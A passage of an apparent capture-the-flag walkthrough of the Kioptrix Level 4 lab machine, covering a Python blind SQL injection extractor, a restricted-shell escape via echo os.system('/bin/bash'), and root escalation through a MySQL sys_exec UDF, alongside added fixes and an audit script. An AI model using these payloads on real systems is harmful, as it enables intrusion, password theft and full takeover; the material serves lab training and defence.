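        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"                           # a broken query changes the response too
    return "login_success" if rows else "Wrong Username or Password"


def checklogin_fixed(con, myusername, mypassword):
    """Same check with a parameterised query: input is bound as data, never as SQL."""
    rows = con.execute(
        "SELECT * FROM members WHERE username=? and password=?",
        (myusername, mypassword),
    ).fetchall()
    return "login_success" if rows else "Wrong Username or Password"


class BlindClient:
    """Boolean oracle over the login form: one request per yes/no question."""

    def __init__(self, login):
        self.login = login          # callable(username, password) -> response body
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # Closes the password literal, ORs in the condition, comments out the rest:
        #   ... and password='x' OR (<condition>)-- '
        payload = f"x' OR ({condition})-- "
        return self.login("admin", payload) == "login_success"


def extract_column(client, column, username, max_len=64):
    """Recover one cell character by character (binary search over ASCII codes)."""
    where = f"username='{username}'"
    length = 0
    while length < max_len and client.ask(
        f"(SELECT length({column}) FROM members WHERE {where}) >= {length + 1}"
    ):
        length += 1
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if client.ask(f"(SELECT unicode(substr({column}, {pos}, 1)) "
                          f"FROM members WHERE {where}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    con = build_db()
    client = BlindClient(lambda u, p: checklogin_vulnerable(con, u, p))
    pw = extract_column(client, "password", "john")
    print(f"john's password: {pw!r} in {client.requests} requests")
    safe = BlindClient(lambda u, p: checklogin_fixed(con, u, p))
    print("same payload against the fixed handler logs in:", safe.ask("1=1"))
```

The request count printed at the end is why sqlmap's run above needed 1473 requests for a handful of values: every character costs about seven yes/no questions. Against the parameterised handler the same payload is just a password that matches nothing.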
3.2 Shell escape
3.2.1 SSH login
Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6
Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
Login succeeds, but the banner shows we are inside a restricted shell (LigGoat Shell) that only accepts a fixed list of commands.
3.2.2 Escaping the restricted shell
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
The restricted shell is escaped: the prompt changes to a normal bash prompt (john@Kioptrix4:~$). The restricted shell is a Python script (the process list in 3.3.1 shows python /bin/kshell), and its echo command evaluates its argument as a Python expression instead of printing it, so os.system('/bin/bash') spawns an unrestricted bash, visible in the same process list as sh -c /bin/bash under python /bin/kshell.
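The following Python demo is an added example and not the source of /bin/kshell, which the write-up does not show. It puts the pattern the escape above exploits (an echo handler that hands its argument to eval()) next to a hardened handler that tokenises the line with shlex, checks the command against an allowlist, and treats arguments as inert text. The allowlist and the RecordingOS stand-in, which records what would have run instead of spawning it, are this example's own assumptions so the demo is safe to execute.

```python
import shlex


class RecordingOS:
    """Stand-in for the os module: records what would have been executed
    instead of spawning it, so the demonstration is safe to run anywhere."""

    def __init__(self):
        self.calls = []

    def system(self, command):
        self.calls.append(command)
        return 0          # what os.system() returns when the child exits 0


def kshell_vulnerable(line, os_module):
    """Restricted shell in the style the ps tree on the target implies for
    /bin/kshell: 'echo' hands its argument to eval(), so the argument is
    executed as Python instead of being printed as text."""
    cmd, _, rest = line.strip().partition(" ")
    if cmd == "echo":
        return str(eval(rest, {"__builtins__": {}, "os": os_module}))
    if cmd == "help":
        return "allowed: echo help exit"
    return f"*** unknown command: {cmd}"


ALLOWED = {"echo", "help", "exit"}   # hypothetical allowlist for the demo


def kshell_hardened(line):
    """Same interface without eval(): tokenise with shlex, check the command
    against an allowlist, and treat every argument as inert data."""
    try:
        argv = shlex.split(line)
    except ValueError as exc:            # e.g. unbalanced quotes
        return f"*** parse error: {exc}"
    if not argv:
        return ""
    cmd, args = argv[0], argv[1:]
    if cmd not in ALLOWED:
        return f"*** command not allowed: {cmd}"
    if cmd == "echo":
        return " ".join(args)
    if cmd == "help":
        return "allowed: " + " ".join(sorted(ALLOWED))
    return ""


if __name__ == "__main__":
    escape = "echo os.system('/bin/bash')"
    fake_os = RecordingOS()
    print("vulnerable:", kshell_vulnerable(escape, fake_os), "->", fake_os.calls)
    print("hardened:  ", kshell_hardened(escape))
```

Stripping __builtins__ from the eval() namespace, as the vulnerable handler does, is not a fix: the attacker only needs the os object that the handler itself exposes. The real fix is never to evaluate user input, which is what the hardened version shows.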
3.3 MySQL UDF privilege escalation
3.3.1 Inspecting running services
john@Kioptrix4:~$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 16:22 ? 00:00:03 /sbin/init
root 2 0 0 16:22 ? 00:00:00 [kthreadd]
root 3 2 0 16:22 ? 00:00:00 [migration/0]
root 4 2 0 16:22 ? 00:00:00 [ksoftirqd/0]
root 5 2 0 16:22 ? 00:00:00 [watchdog/0]
root 6 2 0 16:22 ? 00:00:00 [migration/1]
root 7 2 0 16:22 ? 00:00:00 [ksoftirqd/1]
root 8 2 0 16:22 ? 00:00:00 [watchdog/1]
root 9 2 0 16:22 ? 00:00:00 [events/0]
root 10 2 0 16:22 ? 00:00:00 [events/1]
root 11 2 0 16:22 ? 00:00:00 [khelper]
root 46 2 0 16:22 ? 00:00:00 [kblockd/0]
root 47 2 0 16:22 ? 00:00:00 [kblockd/1]
root 50 2 0 16:22 ? 00:00:00 [kacpid]
root 51 2 0 16:22 ? 00:00:00 [kacpi_notify]
root 247 2 0 16:22 ? 00:00:00 [kseriod]
root 291 2 0 16:22 ? 00:00:00 [pdflush]
root 292 2 0 16:22 ? 00:00:00 [pdflush]
root 293 2 0 16:22 ? 00:00:00 [kswapd0]
root 335 2 0 16:22 ? 00:00:00 [aio/0]
root 336 2 0 16:22 ? 00:00:00 [aio/1]
root 1742 2 0 16:22 ? 00:00:00 [ksuspend_usbd]
root 1746 2 0 16:22 ? 00:00:00 [khubd]
root 2180 2 0 16:22 ? 00:00:00 [ata/0]
root 2181 2 0 16:22 ? 00:00:00 [ata/1]
root 2185 2 0 16:22 ? 00:00:00 [ata_aux]
root 2629 2 0 16:22 ? 00:00:00 [scsi_eh_0]
root 2657 2 0 16:22 ? 00:00:00 [scsi_eh_1]
root 2658 2 0 16:22 ? 00:00:00 [scsi_eh_2]
root 2659 2 0 16:22 ? 00:00:00 [scsi_eh_3]
root 2660 2 0 16:22 ? 00:00:00 [scsi_eh_4]
root 2661 2 0 16:22 ? 00:00:00 [scsi_eh_5]
root 2662 2 0 16:22 ? 00:00:00 [scsi_eh_6]
root 2663 2 0 16:22 ? 00:00:00 [scsi_eh_7]
root 2664 2 0 16:22 ? 00:00:00 [scsi_eh_8]
root 2665 2 0 16:22 ? 00:00:00 [scsi_eh_9]
root 2666 2 0 16:22 ? 00:00:00 [scsi_eh_10]
root 2667 2 0 16:22 ? 00:00:00 [scsi_eh_11]
root 2668 2 0 16:22 ? 00:00:00 [scsi_eh_12]
root 2669 2 0 16:22 ? 00:00:00 [scsi_eh_13]
root 2670 2 0 16:22 ? 00:00:00 [scsi_eh_14]
root 2671 2 0 16:22 ? 00:00:00 [scsi_eh_15]
root 2672 2 0 16:22 ? 00:00:00 [scsi_eh_16]
root 2673 2 0 16:22 ? 00:00:00 [scsi_eh_17]
root 2674 2 0 16:22 ? 00:00:00 [scsi_eh_18]
root 2675 2 0 16:22 ? 00:00:00 [scsi_eh_19]
root 2676 2 0 16:22 ? 00:00:00 [scsi_eh_20]
root 2677 2 0 16:22 ? 00:00:00 [scsi_eh_21]
root 2678 2 0 16:22 ? 00:00:00 [scsi_eh_22]
root 2679 2 0 16:22 ? 00:00:00 [scsi_eh_23]
root 2680 2 0 16:22 ? 00:00:00 [scsi_eh_24]
root 2681 2 0 16:22 ? 00:00:00 [scsi_eh_25]
root 2682 2 0 16:22 ? 00:00:00 [scsi_eh_26]
root 2683 2 0 16:22 ? 00:00:00 [scsi_eh_27]
root 2684 2 0 16:22 ? 00:00:00 [scsi_eh_28]
root 2685 2 0 16:22 ? 00:00:00 [scsi_eh_29]
root 2686 2 0 16:22 ? 00:00:00 [scsi_eh_30]
root 2990 2 0 16:22 ? 00:00:00 [scsi_eh_31]
root 2992 2 0 16:22 ? 00:00:00 [scsi_eh_32]
root 3287 2 0 16:22 ? 00:00:00 [kjournald]
root 3458 1 0 16:22 ? 00:00:00 /sbin/udevd --daemon
root 3805 2 0 16:22 ? 00:00:00 [kgameportd]
root 4103 2 0 16:22 ? 00:00:00 [kpsmoused]
root 5400 1 0 16:22 tty4 00:00:00 /sbin/getty 38400 tty4
root 5401 1 0 16:22 tty5 00:00:00 /sbin/getty 38400 tty5
root 5408 1 0 16:22 tty2 00:00:00 /sbin/getty 38400 tty2
root 5410 1 0 16:22 tty3 00:00:00 /sbin/getty 38400 tty3
root 5413 1 0 16:22 tty6 00:00:00 /sbin/getty 38400 tty6
syslog 5449 1 0 16:22 ? 00:00:00 /sbin/syslogd -u syslog
root 5468 1 0 16:22 ? 00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 5470 1 0 16:22 ? 00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
root 5489 1 0 16:22 ? 00:00:00 /usr/sbin/sshd
root 5545 1 0 16:22 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 5587 5545 0 16:22 ? 00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 5588 5545 0 16:22 ? 00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 5662 1 0 16:22 ? 00:00:00 /usr/sbin/nmbd -D
root 5664 1 0 16:22 ? 00:00:00 /usr/sbin/smbd -D
root 5678 5664 0 16:22 ? 00:00:00 /usr/sbin/smbd -D
root 5679 1 0 16:22 ? 00:00:00 /usr/sbin/winbindd
root 5683 5679 0 16:22 ? 00:00:00 /usr/sbin/winbindd
daemon 5700 1 0 16:22 ? 00:00:00 /usr/sbin/atd
root 5711 1 0 16:22 ? 00:00:00 /usr/sbin/cron
root 5733 1 0 16:22 ? 00:00:00 /usr/sbin/apache2 -k start
dhcp 5783 1 0 16:22 ? 00:00:00 dhclient eth1
root 5790 1 0 16:22 tty1 00:00:00 /sbin/getty 38400 tty1
root 5806 5679 0 16:34 ? 00:00:00 /usr/sbin/winbindd
root 5807 5679 0 16:34 ? 00:00:00 /usr/sbin/winbindd
www-data 6714 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6715 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6716 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6717 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6718 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6719 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 6720 5733 0 17:21 ? 00:00:00 /usr/sbin/apache2 -k start
root 6729 5489 0 17:58 ? 00:00:00 sshd: john [priv]
john 6731 6729 0 17:58 ? 00:00:00 sshd: john@pts/0
john 6732 6731 0 17:58 pts/0 00:00:00 python /bin/kshell
john 6733 6732 0 18:02 pts/0 00:00:00 sh -c /bin/bash
john 6734 6733 0 18:02 pts/0 00:00:00 /bin/bash
john 6753 6734 0 18:05 pts/0 00:00:00 ps -ef
This confirms that mysqld was started with root privileges (note the --user=root flag in the process list).
We will therefore try to escalate privileges through MySQL.
3.3.2 Locating PHP files
john@Kioptrix4:~$ find /var/www -name *.php
/var/www/login_success.php
/var/www/index.php
/var/www/member.php
/var/www/checklogin.php
/var/www/logout.php
/var/www/robert/robert.php
/var/www/john/john.php
3.3.3 Inspecting the PHP file
john@Kioptrix4:~$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
We find that the web application connects to MySQL as root with an empty password.
3.3.4 Logging into the MySQL database
john@Kioptrix4:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6258
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
Login succeeded.
3.3.5 Checking the UDF table
mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)
The lib_mysqludf_sys library is already registered, so the sys_exec() function is available to us.
3.3.6 Adding the user to the admin group
Use the sys_exec() function to add user john to the admin group.
mysql> select sys_exec('usermod -a -G admin john ');
+---------------------------------------+
| sys_exec('usermod -a -G admin john ') |
+---------------------------------------+
| NULL |
+---------------------------------------+
1 row in set (0.04 sec)
The group membership was added successfully.
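An audit script for the three conditions chained in 3.3.1 through 3.3.6 (mysqld running as root, sys_exec registered in mysql.func, an empty database password hard-coded in checklogin.php). This is an added example, not part of the original write-up; it reads its input from stdin so it runs offline against constructed samples modelled on the output shown above, and including sys_eval in the check is an assumption based on that function shipping in the same library.

```shell
#!/bin/sh
# Added audit example (not from the original write-up). Each check reads the
# relevant text from stdin (ps -ef output, a mysql.func listing, PHP source)
# and returns 0 when the risky condition is present.

# ps -ef columns: UID PID PPID C STIME TTY TIME CMD, so $8 is the binary path.
mysqld_runs_as_root() {
    awk '$1 == "root" && $8 ~ /\/mysqld$/ { hit = 1 } END { exit (hit ? 0 : 1) }'
}

# Parses the boxed table printed by `SELECT * FROM mysql.func;`.
# sys_eval is assumed to ship alongside sys_exec in lib_mysqludf_sys.
command_udf_registered() {
    awk -F'|' '/^\|/ { gsub(/ /, "", $2)
                       if ($2 == "sys_exec" || $2 == "sys_eval") hit = 1 }
               END { exit (hit ? 0 : 1) }'
}

# Matches lines such as $password=""; or $password = ''; in PHP source.
php_has_empty_db_password() {
    grep -Eq '^\$password[[:space:]]*=[[:space:]]*(""|'\'\'')'
}

# Constructed samples modelled on what the walkthrough observed on the target.
SAMPLE_PS='root 5587 5545 0 16:22 ? 00:00:04 /usr/sbin/mysqld --user=root'
SAMPLE_FUNC='| name | ret | dl | type |
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |'
SAMPLE_PHP='$username="root"; // Mysql username
$password=""; // Mysql password'

# Runs all three checks against the samples, prints one line per finding with
# the corresponding fix, and ends with a "findings: N" summary line.
audit_samples() {
    findings=0
    printf '%s\n' "$SAMPLE_PS" | mysqld_runs_as_root &&
        { echo "FINDING: mysqld runs as root (start it with --user=mysql)"; findings=$((findings+1)); }
    printf '%s\n' "$SAMPLE_FUNC" | command_udf_registered &&
        { echo "FINDING: sys_exec UDF registered (DROP FUNCTION sys_exec)"; findings=$((findings+1)); }
    printf '%s\n' "$SAMPLE_PHP" | php_has_empty_db_password &&
        { echo "FINDING: empty DB password in web source (set one, use a least-privilege account)"; findings=$((findings+1)); }
    echo "findings: $findings"
}

audit_samples
```

On a live host the same functions take real input, for example `ps -ef | mysqld_runs_as_root` or `cat /var/www/checklogin.php | php_has_empty_db_password`.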
3.3.7 Switching to root
The password is: MyNameIsJohn
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john#
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root
At this point we already have root privileges, O(∩_∩)O haha~ we could even run rm -rf * now.
3.3.8 flag
root@Kioptrix4:/home/john# cd /root
root@Kioptrix4:~# ls
congrats.txt lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
With this, our penetration test of the machine is complete.
Penetration summary
This Kioptrix Level #4 penetration test covered host scanning (nmap\netdiscover), port scanning (nmap\masscan), directory scanning (dirb\dirsearch), SQL injection, and system privilege escalation via a UDF:
- Host discovery
- Directory scanning
- Port scanning
- SQL injection
- Shell escape
- UDF privilege escalation